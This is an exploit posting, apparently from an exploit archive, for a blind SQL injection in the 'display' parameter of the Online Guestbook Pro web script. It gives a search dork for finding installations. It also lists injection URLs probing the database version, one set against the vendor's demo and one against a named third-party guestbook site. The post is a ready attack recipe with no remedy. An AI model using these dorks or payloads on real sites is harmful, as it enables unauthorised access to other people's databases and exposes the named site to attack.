Online Guestbook Pro (display) Blind SQL Injection Vulnerability

================================================================
Online Guestbook Pro (display) Blind SQL Injection Vulnerability
================================================================



Online Guestbook Pro (display) Blind SQL Injection Vulnerability


script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php
 
DorK   : Powered by Online Guestbook Pro




Demo :

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4

BuT Results = Forbidden :D


demo to any web

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4




#  0day.today [2018-04-02]  #